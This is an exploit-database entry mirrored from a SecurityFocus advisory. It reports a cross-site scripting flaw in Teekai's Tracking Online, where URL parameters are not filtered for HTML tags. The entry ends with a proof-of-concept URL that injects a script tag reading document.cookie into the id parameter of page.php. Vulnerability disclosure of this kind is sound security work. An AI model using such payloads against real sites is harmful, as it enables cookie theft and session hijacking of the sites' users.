exploit-db-mirror/platforms/php/webapps/21509.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

5 lines
No EOL
358 B
Text
Executable file

source: http://www.securityfocus.com/bid/4924/info
Teekai's Tracking Online does not adequately filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. Attackers may exploit this by creating a malicious link to a vulnerable webpage.
http://target/page.php?action=view&id=1<script>alert(document.cookie)</script >